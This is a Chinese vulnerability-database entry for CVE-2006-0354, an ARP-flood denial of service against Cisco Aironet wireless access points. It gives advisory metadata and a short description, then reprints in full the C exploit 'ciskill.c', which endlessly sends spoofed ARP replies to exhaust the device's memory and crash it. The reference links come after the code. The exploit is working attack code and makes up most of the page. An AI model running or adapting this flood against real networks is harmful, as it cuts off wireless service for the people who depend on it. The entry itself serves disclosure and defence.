Cisco Aironet无线接入点ARP攻击拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109677 漏洞类型 资源管理错误
发布时间 2006-01-25 更新时间 2009-03-04
CVE编号 CVE-2006-0354 CNNVD-ID CNNVD-200601-286
漏洞平台 Hardware CVSS评分 5.5
|漏洞来源
https://www.exploit-db.com/exploits/1447
https://cxsecurity.com/issue/WLB-2006010027
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-286
|漏洞详情
CiscoAironet无线接入点(AP)是非常流行的无线接入网络设备。CiscoAironet对ARP请求的处理上存在漏洞,远程攻击者可能利用漏洞对设备进行拒绝服务攻击。能够成功关联CiscoIOS无线接入点的攻击者可以欺骗到接入点管理接口的ARP消息。攻击者可以在设备的ARP列表添加条目,直至完全耗尽物理内存。这会导致设备在断电加电重载之前无法传送通讯,影响无线接入点的可用性,可能会无法使用管理和报文转发服务。
|漏洞EXP
//
// Cisco Killer - ciskill.c
//
// Usage: ./ciskill [device]
//
// Author: Pasv (pasvninja [at] gmail.com)
//
// Credit: This exploit takes advantage of a vulnerability that was
// discovered by Eric Smith on January 12, 2006 (bid:16217)
//
// Greets to NW, zimmy, GSO, and the rest.
//
// Description: The vulnerability exists in the way the affected versions
// below handle ARP replies, if enough specially crafted ARP packets are sent
// on the network with the affected systems it will cause the access point memory
// exhaustion which will in a few seconds (depending on the speed of the attacker
// and the memory of the target) crash the system, making all ingoing/outgoing
// traffic stopped.
//
// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility
// for your actions (like a knife maker).
//
// Versions affected:
//  Cisco Aironet 350 IOS
//  Cisco Aironet 1400
//  Cisco Aironet 1300
//  Cisco Aironet 1240AG
//  Cisco Aironet 1230AG
//  Cisco Aironet 1200
//  Cisco Aironet 1130AG
//  Cisco Aironet 1100
// (this includes most linksys wireless access points)



#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/sockios.h>

// Edit this packet accordingly if the target is picky
char pkt[]=
// Ethernet header
"\xff\xff\xff\xff\xff\xff" 	// Destination: broadcast
"AAAAAA"			// Source: 41:41:41:41:41:41
"\x08\x06"			// Pkt type: ARP
// ARP header
"\x00\x01"			// Hardware type: Ethernet
"\x08\x00"			// Protocol: IP
"\x06"				// Hardware size: 6
"\x04"				// Protocol size: 4
"\x00\x02"			// Opcode: Reply
"AAAAAA"			// Sender (Mac): 41:41:41:41:41:41
"AAAA"				// Sender (IP): 65.65.65.65
"AAAAAA"			// Target (mac): 41:41:41:41:41:41
"AAAA"				// Target (IP): 65.65.65.65
; // End of Packet

int main(int argc, char **argv) {
	FILE *fp;
	int sock, seed;
	long count;
	char *device;
	in_addr_t addr;
	struct sockaddr sin;
	
	printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n");
	if(getuid()) {
		printf("Must be root to inject arp packets!\n");
		exit(1);
	}
	
	if(argc != 2) {
		strcpy(device,"wlan0");
	}
	else {
		device=argv[1];
	}

	fp = fopen("/dev/urandom", "r");
	fscanf(fp,"%d", &seed);
	fclose(fp);
	srand(seed);
	
	memset(&sin, 0, sizeof(sin));
	sin.sa_family = AF_UNSPEC;
	strncpy(sin.sa_data,device, 14);
	
	sock = socket(PF_INET, SOCK_PACKET, 0x300);
	
	printf("Using device: %s\n\n", device);	
	
	// stupid
	printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n");
	sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1);
	
	while(1) {
		addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff);
		pkt[28] = (char)addr;
		pkt[38] = (char)addr;
		count++;
		printf("#:%ld bytes sent: %d (should be 42)\n",count,  sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin)));
	}
}

// milw0rm.com [2006-01-25]
|参考资料

来源:VUPEN
名称:ADV-2006-0176
链接:http://www.frsirt.com/english/advisories/2006/0176
来源:SECTRACK
名称:1015483
链接:http://securitytracker.com/id?1015483
来源:SECUNIA
名称:18430
链接:http://secunia.com/advisories/18430
来源:XF
名称:cisco-aironet-arp-dos(24086)
链接:http://xforce.iss.net/xforce/xfdb/24086
来源:BID
名称:16217
链接:http://www.securityfocus.com/bid/16217
来源:OSVDB
名称:22375
链接:http://www.osvdb.org/22375
来源:CISCO
名称:20060112AccessPointMemoryExhaustionfromARPAttacks
链接:http://www.cisco.com/warp/public/707/cisco-sa-20060112-wireless.shtml
来源:SREASON
名称:339
链接:http://securityreason.com/securityalert/339
来源:OVAL
名称:oval:org.mitre.oval:def:5680
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5680